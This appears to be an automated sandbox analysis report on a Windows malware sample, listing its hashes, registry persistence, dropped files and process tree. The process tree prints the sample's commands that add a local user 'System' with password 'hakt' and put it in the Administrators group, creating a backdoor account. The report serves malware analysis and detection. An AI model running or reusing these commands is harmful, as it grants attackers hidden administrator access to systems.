Analysis
- max time kernel: 141s
- max time network: 122s
- platform: windows10-2004_x64
- resource: win10v2004-20231222-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231222-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 03/02/2024, 00:18
Static task: static1
Behavioral task: behavioral1
- Sample: 8ae7bb9d6119c991386fa9ed8149c33e.exe
- Resource: win7-20231215-en
Behavioral task: behavioral2
- Sample: 8ae7bb9d6119c991386fa9ed8149c33e.exe
- Resource: win10v2004-20231222-en
General
- Target: 8ae7bb9d6119c991386fa9ed8149c33e.exe
- Size: 54KB
- MD5: 8ae7bb9d6119c991386fa9ed8149c33e
- SHA1: 2647ea011d14a51443c4e83c85e64124ab166d31
- SHA256: 87d19e3bff436f6d204095917f7a2b1dd58d093d637b8cc0a6aa38b761832241
- SHA512: 5239f922e773828896c6bfb98ec0cf1bc9688eadb3e858fa27cb71ed2f691d5e0ada63b8b14ab65139046d887d168f540e8062ff9fdea562cb0db980fc656a21
- SSDEEP: 1536:ts+Zgajv3kHK35Y0RKsZ1Ls3JcBHHx/KboFwbQp8X:tFC4kq35Yds/Ls3JcBnAFby8
Malware Config
Signatures

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Description | IoC | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | 8ae7bb9d6119c991386fa9ed8149c33e.exe

Adds Run key to start application (2 TTPs, 1 IoC)
Description | IoC | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows System Configuration = "C:\\Windows\\SYSCFG16.EXE" | 8ae7bb9d6119c991386fa9ed8149c33e.exe

Drops file in Windows directory (3 IoCs)
Description | IoC | Process
File created | C:\Windows\SYSCFG16.EXE | 8ae7bb9d6119c991386fa9ed8149c33e.exe
File opened for modification | C:\Windows\SYSCFG16.EXE | 8ae7bb9d6119c991386fa9ed8149c33e.exe
File created | C:\Windows\temp.bat | 8ae7bb9d6119c991386fa9ed8149c33e.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Runs net.exe

Suspicious use of WriteProcessMemory (15 IoCs)
Description | PID | Process | Target PID
PID 4696 wrote to memory of 380 | 4696 | 8ae7bb9d6119c991386fa9ed8149c33e.exe | 96
PID 4696 wrote to memory of 380 | 4696 | 8ae7bb9d6119c991386fa9ed8149c33e.exe | 96
PID 4696 wrote to memory of 380 | 4696 | 8ae7bb9d6119c991386fa9ed8149c33e.exe | 96
PID 380 wrote to memory of 1200 | 380 | cmd.exe | 98
PID 380 wrote to memory of 1200 | 380 | cmd.exe | 98
PID 380 wrote to memory of 1200 | 380 | cmd.exe | 98
PID 1200 wrote to memory of 2540 | 1200 | net.exe | 99
PID 1200 wrote to memory of 2540 | 1200 | net.exe | 99
PID 1200 wrote to memory of 2540 | 1200 | net.exe | 99
PID 380 wrote to memory of 3460 | 380 | cmd.exe | 100
PID 380 wrote to memory of 3460 | 380 | cmd.exe | 100
PID 380 wrote to memory of 3460 | 380 | cmd.exe | 100
PID 3460 wrote to memory of 1660 | 3460 | net.exe | 101
PID 3460 wrote to memory of 1660 | 3460 | net.exe | 101
PID 3460 wrote to memory of 1660 | 3460 | net.exe | 101
Processes
(numbers give the nesting depth in the process tree)

1. C:\Users\Admin\AppData\Local\Temp\8ae7bb9d6119c991386fa9ed8149c33e.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\8ae7bb9d6119c991386fa9ed8149c33e.exe"
   PID: 4696
   - Checks computer location settings
   - Adds Run key to start application
   - Drops file in Windows directory
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Windows\temp.bat" "
      PID: 380
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\SysWOW64\net.exe
         Command line: net user /add System hakt
         PID: 1200
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\SysWOW64\net1.exe
            Command line: C:\Windows\system32\net1 user /add System hakt
            PID: 2540
      3. C:\Windows\SysWOW64\net.exe
         Command line: net localgroup /add Administrators System
         PID: 3460
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\SysWOW64\net1.exe
            Command line: C:\Windows\system32\net1 localgroup /add Administrators System
            PID: 1660
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 89B
- MD5: dccbf9e7aa8e5e8a7d44c634aa4b3e8a
- SHA1: a2e14c86d1a890f37afe11e0ef02f3b5f05cf3c3
- SHA256: 554c21f981ac2139afa84e5af335c54fce3e0b05db145abef9eb7b2c23612398
- SHA512: 8581f237ce5a9df85ebee9f23fe56f6f27d37c6ea66e9c40cd73b6b85487b6e915f83e5a2740eabed7cd2133c6dca46bd062c5429e2223904ffd9aaff09c8e28